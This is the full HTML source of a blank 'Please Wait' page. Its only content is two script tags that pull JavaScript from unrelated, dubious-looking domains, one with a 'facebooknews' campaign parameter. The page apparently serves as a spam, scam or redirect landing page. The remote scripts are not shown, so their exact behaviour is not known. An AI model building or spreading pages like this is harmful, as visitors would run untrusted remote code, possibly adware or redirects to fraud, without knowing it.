<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Please Wait</title>	
	<script type='text/javascript' src='//crummygoddess.com/bf/cc/54/bfcc54c4a4685e1c4f8622afeebbe7b5.js'></script>
<body>
<script src="https://damasjonome.xyz/cheitopetacom/?api=1&lan=facebooknews&ht=1&counter0=petacom123" type="text/javascript" async="true"></script>
</html>